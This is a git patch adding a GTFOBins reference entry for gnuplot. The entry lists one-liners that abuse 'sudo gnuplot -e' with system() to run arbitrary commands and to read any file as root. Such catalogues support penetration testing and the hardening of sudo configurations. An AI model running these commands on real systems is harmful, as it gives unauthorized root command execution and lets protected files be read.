From b955893a3ef5843b4db4c836d89a285eac8d3f85 Mon Sep 17 00:00:00 2001 From: frissi0n Date: Mon, 11 Nov 2024 14:23:25 +0000 Subject: [PATCH] Add gnuplot --- _gtfobins/gnuplot.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 _gtfobins/gnuplot.md diff --git a/_gtfobins/gnuplot.md b/_gtfobins/gnuplot.md new file mode 100644 index 0000000..d0c10df --- /dev/null +++ b/_gtfobins/gnuplot.md @@ -0,0 +1,11 @@ +--- +functions: + sudo: + - code: | + COMMAND=id + sudo gnuplot -e 'set print "-" ; print system("'$COMMAND'")' + file-read: + - code: | + LFILE=file_to_read + sudo gnuplot -e 'set print "-" ; print system("cat '$LFILE'")' +---